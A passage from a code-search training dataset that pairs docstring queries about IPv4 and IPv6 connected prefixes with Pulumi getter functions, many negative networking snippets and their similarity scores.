] | 0.66921926 | 0 |
The IPV4 prefix (CIDR) assigned to this L3 network. Required when the IP allocation type is IPV4 or DualStack. | def ipv4_connected_prefix(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "ipv4_connected_prefix") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def local_ipv4_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def local_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv4_network_cidr\")",
"def ipv4_connected_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_connected_prefix\")",
"def ipv4(self):\n return Network(private=True).ipv4",
"def ipv4_address(self) -> str:\n return pulumi.get(self, \"ipv4_address\")",
"def ipv4_address(self) -> str:\n return pulumi.get(self, \"ipv4_address\")",
"def ipv4_cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_cidr_block\")",
"def ipv4_address_space(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv4_address_space\")",
"def ipv4_address_space(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_address_space\")",
"def network(self):\n address = unicode(\"%s/%s\" % (self.address, _get_cidr(self.netmask)))\n return IPv4Network(address, strict=False)",
"def cluster_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use cluster_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"cluster_ipv4_cidr is deprecated: This field is deprecated, use cluster_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"cluster_ipv4_cidr\")",
"def prefixes_ipv4(self):\n with open(self.ixpfx) as f:\n ixpfx = json.load(f)\n return [item['prefix'] for item in ixpfx['data'] if item['protocol'] == 'IPv4']",
"def ipv4_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv4_address\")",
"def remote_ipv4_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"remote_ipv4_network_cidr\")",
"def node_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use node_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"node_ipv4_cidr is deprecated: This field is deprecated, use node_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"node_ipv4_cidr\")",
"def _get_ipv4(self):\n return self.__ipv4",
"def _get_ipv4(self):\n return self.__ipv4",
"def _get_ipv4(self):\n return self.__ipv4",
"def subnet_prefix(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"subnet_prefix\")",
"def remote_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv4_network_cidr\")",
"def remote_ipv4_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv4_network_cidr\")",
"def get_ipv4_address(self):\n \n ipv4_address = self._dhcp_client_ctrl.getIpv4Address()\n if ipv4_address is None:\n return None\n else:\n return unicode(ipv4_address)",
"def getIpv4Netmask(self):\n with self.status._dhcp_status_mutex:\n if self.status.ipv4_lease_valid is None:\n return None\n else:\n return self.status.ipv4_netmask",
"def master_ipv4_cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"master_ipv4_cidr_block\")",
"def local_ipv6_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def ip_address_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ip_address_prefix\")",
"def normalize_ip4(self):\n\n ip = str(self.ip4)\n # Let's normalize the ip list first\n ip_list = list(\n map(\n lambda v: ipaddress.IPv4Network(v),\n filter(\n lambda v: self.try_convert(v, None, ipaddress.IPv4Network),\n map(\n lambda v: v.split('|')[1].split('/')[0].strip()\n if '|' in v else\n v.split('/')[0].strip(),\n ip.split(',')\n )\n )\n )\n )\n\n if ip_list:\n ip_list.sort()\n ip = tuple(\n int(c)\n for c in str(ip_list[0]).split('/')[0].split('.')\n )\n else:\n ip = (9999, ip)\n\n self.ip4 = ip",
"def node_ipv4_cidr_size(self) -> int:\n return pulumi.get(self, \"node_ipv4_cidr_size\")",
"def cidr(self):\n return self._cidr",
"def prefixlen(self):\n return self._ip_range.prefixlen",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def NoOfAddressPrefix(self):\n return self._get_attribute('noOfAddressPrefix')",
"def get_ipv4_netmask(self):\n \n ipv4_netmask = self._dhcp_client_ctrl.getIpv4Netmask()\n if ipv4_netmask is None:\n return None\n else:\n return unicode(ipv4_netmask)",
"def cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"cidr\")",
"def Ipv4Flag(self):\r\n\t\treturn self._get_attribute('ipv4Flag')",
"def getIpv4Address(self):\n with self.status._dhcp_status_mutex:\n if self.status.ipv4_lease_valid is None:\n return None\n else:\n return self.status.ipv4_address",
"def get_address(self):\n return self.get_ipv4_address()",
"def cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cidr\")",
"def cidr(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"cidr\")",
"def services_ipv4_cidr(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"This field is deprecated, use services_ipv4_cidr_block.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"services_ipv4_cidr is deprecated: This field is deprecated, use services_ipv4_cidr_block.\"\"\")\n\n return pulumi.get(self, \"services_ipv4_cidr\")",
"def __str__(self):\n retval = \"IPv4\\n\"\n for field in self.layout:\n if (field.name == \"src\" or field.name == \"dst\"):\n value = inet_ntop(AF_INET,\n struct.pack('!L', self.__dict__[field.name]))\n retval += \"%s %s\\n\" % (field.name, value)\n else:\n retval += \"%s %s\\n\" % (field.name, self.__dict__[field.name])\n return retval",
"def allocate_subnet(self):\n if len(self.subnet_list) == 0:\n subnet = '192.168.1.0/24'\n self.subnet_list.append(subnet)\n return subnet\n else:\n subnet = self.subnet_list[::-1][0]\n ip = ipaddress.IPv4Network(subnet)[0]\n s = ipaddress.IPv4Address(ip) + 256\n return '{}{}'.format(s, '/24')",
"def Ipv4rate(self):\n\t\treturn self._get_attribute('ipv4rate')",
"def reverse_prefix(self):\n if self.type == ZONE_REVERSE_IPV4:\n # Get IPv4 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".in-addr.arpa\"):\n r = n[:-13].split(\".\")\n r.reverse()\n length = 4 - len(r)\n r += [\"0\"] * length\n ml = 32 - 8 * length\n return \".\".join(r) + \"/%d\" % ml\n elif self.type == ZONE_REVERSE_IPV6:\n # Get IPv6 prefix covering reverse zone\n n = self.name.lower()\n if n.endswith(\".ip6.int\"):\n n = n[:-8]\n elif n.endswith(\".ip6.arpa\"):\n n = n[:-9]\n else:\n raise Exception(\"Invalid IPv6 zone suffix\")\n p = n.split(\".\")\n p.reverse()\n length = len(p)\n if length % 4:\n p += [\"0\"] * (4 - length % 4)\n r = \"\"\n for i, c in enumerate(p):\n if i and i % 4 == 0:\n r += \":\"\n r += c\n if len(p) != 32:\n r += \"::\"\n prefix = r + \"/%d\" % (length * 4)\n return IPv6(prefix).normalized.prefix",
"def test_ip4_cidr_syntax_internal_v6(self):\n \n test_ip = ip_address.IPAddress(\"192.168.0.1/24\")\n \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 192, 168, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/16\") \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/8\")\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1\")\n assert test_ip.subnet == []",
"def address_prefix(self) -> Optional[str]:\n return pulumi.get(self, \"address_prefix\")",
"def test_IPv4s_to_valid_CIDR(self):\n self.assertEqual(\n helpers.IPRange_to_valid_CIDR('192.168.0.1', '192.168.0.1'),\n '192.168.0.1/32'\n )",
"def to_network_v4(zone: Zone) -> ipaddress.IPv4Network:\n\n labels = zone.name.split(\".\")[:-3]\n netmask: int = 8 * len(labels)\n offset = 4 - len(labels)\n\n pattern = r\"^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)([/-](2[5-9]|3[0-1]))?$\"\n last_label_parsed = re.search(pattern, labels[0])\n if not last_label_parsed:\n raise ValueError(\"Faild to parse the zone name\")\n\n if last_label_parsed[2]:\n # non-octet boundary delegation detected\n # remove netmask and save it to the result\n last_octect = last_label_parsed[1]\n labels[0] = last_octect\n netmask = int(last_label_parsed[2][1:])\n\n labels = [\"0\"] * offset + labels\n prefix_str = \".\".join(reversed(labels))\n prefix_str += f\"/{netmask}\"\n\n return ipaddress.IPv4Network(prefix_str, strict=True)",
"def customer_owned_ipv4_pool(self) -> str:\n return pulumi.get(self, \"customer_owned_ipv4_pool\")",
"def public_ip_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceReferenceArgs']]]]:\n return pulumi.get(self, \"public_ip_prefixes\")",
"def getnetwork(ipaddr):\n return '192.168.1.0/24'",
"def PrefixIpv6Address(self):\n if self.force_auto_sync:\n self.get('PrefixIpv6Address')\n return self._PrefixIpv6Address",
"def get_ip4_adresses(self):\n self._search_regx(self.PATTERN_IP4)\n return self._ip_adresses",
"def get_netmask(self):\n return self.get_ipv4_netmask()",
"def cidr_block(self):\n return self._cidr_block",
"def ipv6_connected_prefix(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv6_connected_prefix\")",
"def ip4range(iprange):\n assert not ('/' in iprange and '-' in iprange),'cidr and dash notation is not possible'\n if '/' in iprange:\n #cidr range\n ippart,mask=iprange.split('/',1)\n mask=int(mask)\n ip=ip_pad(ippart)\n lowerlong,upperlong=cidr2lowerupper(ip,mask)\n lowerip=long2ip(lowerlong)\n upperip=long2ip(upperlong)\n \n elif '-' in iprange:\n lpart,upart=iprange.split('-',1)\n lowerip=ip_pad(lpart)\n \n #upperip only one octet? fill last specified octed from lpart\n if '.' not in upart:\n sp=lpart.split('.')\n sp[-1]=upart\n upart='.'.join(sp)\n \n upperip=ip_pad(upart,True)\n else:\n lowerip=ip_pad(iprange)\n upperip=ip_pad(iprange,True)\n \n return lowerip,upperip",
"def subnet_prefix_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"subnet_prefix_length\")",
"def format_ipv4(value, mask=None):\n value_ipv4 = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(value))])\n if mask is None:\n return value_ipv4\n value_mask = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(mask))])\n return \"{}/{}\".format(value_ipv4, value_mask)",
"def _validate_network_prefix(self):\n try:\n cidr = netaddr.IPNetwork(self.network + \"/\" + str(self.prefix))\n except netaddr.core.AddrFormatError:\n raise ValueError(_(\"Invalid IP address and prefix\"))\n address = netaddr.IPAddress(self.network)\n if address != cidr.network:\n raise ValueError(_(\"Invalid IP network %(address)s/%(prefix)s \"\n \"expecting %(network)s/%(prefix)s\") %\n {'address': self.network,\n 'prefix': self.prefix,\n 'network': cidr.network})",
"def get_main_ipv4():\n try:\n # No data is actually transmitted (UDP)\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect( ('8.8.8.8', 53) )\n real_ip = s.getsockname()[0]\n s.close()\n return real_ip\n except socket.error as e:\n logging.error(\"Cannot retrieve current IPv4 address: %s\" % e)\n return None",
"def ipv6_connected_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_connected_prefix\")",
"def isIpv4AddrWithNetmask(string):\n return (True)",
"def get_min_addr(self):\n\n out = None\n for segment in self.segments:\n if out is None or segment.min_addr < out:\n out = segment.min_addr\n\n if out is None:\n for section in self.sections:\n if out is None or section.min_addr < out:\n out = section.min_addr\n\n if out is None:\n return self.rebase_addr\n else:\n return out + self.rebase_addr",
"def get_dns_name_prefix(self) -> Union[str, None]:\n return self._get_dns_name_prefix(enable_validation=True)",
"def ip(self):\n if not self._ip:\n if 'ip' in self.config:\n ip = self.config['ip']\n else:\n ip = self.protocol.transport.get_extra_info('sockname')[0]\n ip = ip_address(ip)\n if ip.version == 4:\n self._ip = ip\n else: # pragma: no cover\n response = urlopen('http://ipv4.icanhazip.com/')\n ip = response.read().strip().decode()\n ip = ip_address(ip)\n self._ip = ip\n return self._ip",
"def tunnel1_inside_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"tunnel1_inside_cidr\")",
"def tunnel1_inside_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"tunnel1_inside_cidr\")",
"def encode_ipv4(self, input):\n return inet_aton(input)",
"def get_ipv4_defaultgw(self):\n \n ipv4_defaultgw = self._dhcp_client_ctrl.getIpv4DefaultGateway()\n if ipv4_defaultgw is None:\n return None\n else:\n return unicode(ipv4_defaultgw)",
"def _rloc_ip_net_addr(self):\n self.net_addr = ':'.join(self.rloc.split(':')[:-1]) + ':'\n return self.net_addr",
"def find_ipv4():\n try:\n r = requests.get(v4_url)\n tree = html.fromstring(r.content)\n result = tree.xpath('//body/text()')\n result = result[0].split()\n ipv4 = result[len(result)-1]\n except:\n if cfg['debug']:\n print(\"Couldn't connect to %s\" % v4_url)\n print(\"Check that you have a valid IPv4 default route\")\n ipv4 = None\n\n return ipv4",
"def tunnel1_inside_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"tunnel1_inside_cidr\")",
"def isofy_ipv4(ip_string, prefix=\"\"):\n ipaddress.IPv4Address(ip_string) # fails for invalid IP\n\n if prefix != \"\":\n prefix_valid = bool(re.match(r\"^.{2}(\\..{4})*?$\", prefix))\n if not prefix_valid:\n raise ValueError(f\"{prefix} cannot be used as ISO prefix, please check formatting\")\n prefix += \".\"\n # IP: split and fill with 0s\n ip_parts = ip_string.split(\".\")\n padded = [p.zfill(3) for p in ip_parts]\n joined = \"\".join(padded)\n # IP: split to chunks à 4 chars\n chunksize = 4\n ip_chunks = [joined[i : i + chunksize] for i in range(0, len(joined), chunksize)]\n # combine\n iso_address = prefix + \".\".join(ip_chunks) + \".00\"\n return iso_address",
"def pod_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"pod_cidr\")",
"def pod_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"pod_cidr\")",
"def source_cidr_block(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"source_cidr_block\")",
"def min_addr(self):\n return self.vaddr",
"def update_gateway_with_prefixlen(self, ipv4='', ipv4_prefixlen=0, \n ipv6='', ipv6_prefixlen=0, port_no=''):\n port = self.ports[port_no]\n\n if port.gateway is None:\n port.gateway = Gateway(name=port.name, port_no=port.port_no,\n ipv4=ipv4, ipv4_prefixlen=ipv4_prefixlen,\n ipv6=ipv6, ipv6_prefixlen=ipv6_prefixlen)\n else:\n port.gateway.name = port.name\n port.gateway.ipv4 = netaddr.IPAddress(ipv4)\n port.gateway.ipv4_subnet = netaddr.IPNetwork(ipv4 + '/' + str(ipv4_prefixlen))\n port.gateway.ipv6 = netaddr.IPAddress(ipv6)\n port.gateway.ipv6_subnet = netaddr.IPNetwork(ipv6 + '/' + str(ipv6_prefixlen))\n port.gateway.port_no = port.port_no\n\n self.tbl.update_entry(subnet=port.gateway.ipv4_subnet, receive_port=port, metric=0, source=\"CONNECTED\")",
"def get_node_ip(self, prefix_db: openr_types.PrefixDatabase) -> Any:\n\n # First look for LOOPBACK prefix\n for prefix_entry in prefix_db.prefixEntries:\n if prefix_entry.type == network_types.PrefixType.LOOPBACK:\n return ipnetwork.sprint_addr(prefix_entry.prefix.prefixAddress.addr)\n\n # Else return None\n return None",
"def address_space_prefixes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"address_space_prefixes\")",
"def network(ip):\n ip, prefix = netParse(ip)\n return \"{}/{}\".format(\n ipStr(ip & (0xffffffff << (32 - prefix))),\n prefix\n )",
"def address_to_ip_prefix(address):\n return address.split('/')",
"def source_cidr_block(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"source_cidr_block\")",
"def uuid_prefix(self) -> str:\n return str(self.uuid)[:-4]",
"def test_IPv4_to_CIDR(self):\n match_list = '1.2.3.0/29'\n self.assertEqual(helpers.IPRange_to_CIDR('1.2.3.1', '1.2.3.6'), match_list)",
"def get_network(address: str, netmask: str) -> IPv4Network:\n net = IPv4Network(f\"{address}/{netmask}\", strict=False)\n return net",
"def transit_router_cidr_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"transit_router_cidr_id\")",
"def ipv4_addresses(self) -> Dict[str, List[IPv4Address]]:\n log.debug(\"Host %s: ipv4 addresses of the devices interfaces %s.\", self.host, self._get_ipv4_addresses(\"self\"))\n return self._get_ipv4_addresses(\"self\")",
"def ipv4_enabled(self) -> bool:\n return pulumi.get(self, \"ipv4_enabled\")",
"def cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr_block\")",
"def address_space_prefixes(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"address_space_prefixes\")",
"def source_cidr_block(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"source_cidr_block\")",
"def ipv4_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ipv4_enabled\")",
"def address(self):\n return f'Address = {self._peer.address}/{self._peer.subnet.prefixlen}'"
] | [
"0.748467",
"0.7397195",
"0.7397195",
"0.72900414",
"0.7255836",
"0.68101245",
"0.68101245",
"0.6797655",
"0.6686527",
"0.66722995",
"0.6519062",
"0.644197",
"0.64091825",
"0.64038914",
"0.6388208",
"0.63576555",
"0.6327051",
"0.6327051",
"0.6327051",
"0.6295223",
"0.6267015",
"0.6267015",
"0.6254608",
"0.62361073",
"0.62058383",
"0.61998755",
"0.6198242",
"0.6167111",
"0.6158947",
"0.6149186",
"0.61069787",
"0.6034688",
"0.6034688",
"0.60039353",
"0.599088",
"0.5910903",
"0.5910903",
"0.5890702",
"0.5837912",
"0.5837451",
"0.5831798",
"0.5831798",
"0.57978296",
"0.57978296",
"0.5758885",
"0.5756942",
"0.5753974",
"0.5752884",
"0.56977177",
"0.5688743",
"0.5688455",
"0.566763",
"0.56580764",
"0.56351525",
"0.5607291",
"0.5604963",
"0.56020474",
"0.55631715",
"0.5525816",
"0.55180234",
"0.54839665",
"0.5472659",
"0.5469961",
"0.54625165",
"0.5460016",
"0.54570067",
"0.54552466",
"0.54382735",
"0.5388508",
"0.5369542",
"0.5366072",
"0.5361888",
"0.5361888",
"0.5360986",
"0.5351798",
"0.53450537",
"0.5314042",
"0.5308127",
"0.5302534",
"0.5299187",
"0.5299187",
"0.52968633",
"0.5289738",
"0.52840203",
"0.5274408",
"0.5270567",
"0.52631235",
"0.5262026",
"0.5260581",
"0.5260497",
"0.52598244",
"0.5255794",
"0.52445245",
"0.52444124",
"0.52408457",
"0.5232279",
"0.5219829",
"0.5211037",
"0.5210617",
"0.52082485"
] | 0.7218586 | 5 |
The IPV6 prefix (CIDR) assigned to this L3 network. Required when the IP allocation type is IPV6 or DualStack. | def ipv6_connected_prefix(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "ipv6_connected_prefix") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def PrefixIpv6Address(self):\n if self.force_auto_sync:\n self.get('PrefixIpv6Address')\n return self._PrefixIpv6Address",
"def local_ipv6_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def local_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"local_ipv6_network_cidr\")",
"def ipv6_connected_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_connected_prefix\")",
"def ipv6_address_space(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_address_space\")",
"def ipv6_address_space(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"ipv6_address_space\")",
"def remote_ipv6_network_cidr(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"remote_ipv6_network_cidr\")",
"def remote_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv6_network_cidr\")",
"def remote_ipv6_network_cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ipv6_network_cidr\")",
"def ipv6_address(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_address\")",
"def ipv6_cidr_block_association_id(self) -> str:\n return pulumi.get(self, \"ipv6_cidr_block_association_id\")",
"def subnet_prefix(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"subnet_prefix\")",
"def toV6(self):\n return V6Address.fromV4(self)",
"def ipv6_address(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"use `ipv6_addresses` attribute instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: use `ipv6_addresses` attribute instead\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def GlobalIpv6Address(self):\n if self.force_auto_sync:\n self.get('GlobalIpv6Address')\n return self._GlobalIpv6Address",
"def ipv6_address(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"use `ipv6_addresses` attribute instead\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: use `ipv6_addresses` attribute instead\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def ipv6_address(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def ipv6_address(self) -> str:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def Ipv6Flag(self):\r\n\t\treturn self._get_attribute('ipv6Flag')",
"def Ipv6Srh(self):\r\n\t\treturn self._get_attribute('ipv6Srh')",
"def ipv6_gateway_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"ipv6_gateway_id\")",
"def ipv6_networks(view):\n return \"ipv6network?\" \\\n \"_return_fields=\" \\\n \"extattrs,\" \\\n \"comment,\" \\\n \"network,\" \\\n \"network_view,\" \\\n \"utilization&\" \\\n \"network_view=\" + view + \\\n \"&_max_results=-25000\"",
"def LinkLocalIpv6Address(self):\n if self.force_auto_sync:\n self.get('LinkLocalIpv6Address')\n return self._LinkLocalIpv6Address",
"def ipv6_gateway_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"ipv6_gateway_id\")",
"def get_ipv6_zone_connection(self):\n return self.m_connection.ipv6_zones",
"def ipv6_address(self) -> pulumi.Output[str]:\n warnings.warn(\"\"\"The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"ipv6_address is deprecated: The IPv6 address assigned to the instance. (Deprecated) This property was applicable only to First Generation instances.\"\"\")\n\n return pulumi.get(self, \"ipv6_address\")",
"def Ipv6rate(self):\n\t\treturn self._get_attribute('ipv6rate')",
"def ipv6_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"ipv6_addresses\")",
"def get_ipv6_list():\n ipv6 = __grains__.get(\"ipv6\")\n\n return \" \".join([\"[\" + ip + \"]\" for ip in ipv6])",
"def get_main_ipv6():\n try:\n # No data is actually transmitted (UDP)\n s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)\n s.connect( ('2001:4860:4860::8888', 53) )\n real_ip = s.getsockname()[0]\n s.close()\n return real_ip\n except socket.error as e:\n logging.error(\"Cannot retrieve current IPv6 address: %s\" % e)\n return None",
"def cluster_subnet(self) -> str:\n return pulumi.get(self, \"cluster_subnet\")",
"def to_network_v6(zone: Zone) -> ipaddress.IPv6Network:\n\n labels = zone.name.split(\".\")[:-3]\n\n zone_reverse_str = \"\".join(reversed(labels))\n if len(zone_reverse_str) % 4 != 0:\n for _ in range(4 - (len(zone_reverse_str) % 4)):\n zone_reverse_str += \"0\"\n prefix_str = \":\".join(\n [zone_reverse_str[i : i + 4] for i in range(0, len(zone_reverse_str), 4)]\n )\n prefix_str += f\"::/{len(labels) * 4}\"\n\n return ipaddress.IPv6Network(prefix_str, strict=True)",
"def ipv6_bandwidth(self):\n return self._ipv6_bandwidth",
"def _get_virtual_oper_VipV6_address(self):\n return self.__virtual_oper_VipV6_address",
"def allocate_subnet(self):\n if len(self.subnet_list) == 0:\n subnet = '192.168.1.0/24'\n self.subnet_list.append(subnet)\n return subnet\n else:\n subnet = self.subnet_list[::-1][0]\n ip = ipaddress.IPv4Network(subnet)[0]\n s = ipaddress.IPv4Address(ip) + 256\n return '{}{}'.format(s, '/24')",
"def sc_subnet(self):\n return self._sc_subnet",
"def test_ip4_cidr_syntax_internal_v6(self):\n \n test_ip = ip_address.IPAddress(\"192.168.0.1/24\")\n \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff, 192, 168, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/16\") \n assert test_ip.addr == [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1/8\")\n assert test_ip.subnet == [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x0, 0x0, 0]\n \n test_ip = ip_address.IPAddress(\"127.0.0.1\")\n assert test_ip.subnet == []",
"def ipv6_to_ipv4(ipv6_str):\n return '.'.join([str(b) for b in ipv6_str[12:]])",
"def subnet_prefix_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"subnet_prefix_length\")",
"def get_if_raw_addr6(iff):\n ip6 = get_if_addr6(iff)\n if ip6 is not None:\n return inet_pton(socket.AF_INET6, ip6)\n\n return None",
"def get_global_ip_ipv6():\n network_info_providers = [\n 'http://v6.ipv6-test.com/api/myip.php',\n 'http://v6.ident.me/',\n ]\n random.shuffle(network_info_providers)\n for url in network_info_providers:\n try:\n return requests.get(url).text.lstrip().rstrip()\n except Exception:\n continue\n else:\n log.info('cannot find global ipv6 ip')\n return \"\"",
"def get_intf_address(self, intf, pod, v6=False):\n if v6:\n cmd = [\"ifconfig \" + intf + \" | grep Global\"]\n output = pod.run_cmd_on_vm(cmd)\n ip6 = re.search(\n r'inet6\\s+addr\\s*:\\s*(\\S*)',\n output['ifconfig eth0 | grep Global'])\n ip6_addr = ip6.group(1)\n return ip6_addr\n cmd = [\"ifconfig \" + intf + \" | grep inet\"]\n output = pod.run_cmd_on_vm(cmd)\n ip = re.search(\n r'inet\\s+addr\\s*:\\s*(\\d+.\\d+.\\d+.\\d+)',\n output['ifconfig eth0 | grep inet'])\n ip_addr = ip.group(1)\n return ip_addr",
"def ipv6_addresses(self) -> Dict[str, List[IPv6Address]]:\n log.debug(\"Host %s: ipv6 addresses of the devices interfaces %s.\", self.host, self._get_ipv6_addresses(\"self\"))\n return self._get_ipv6_addresses(\"self\")",
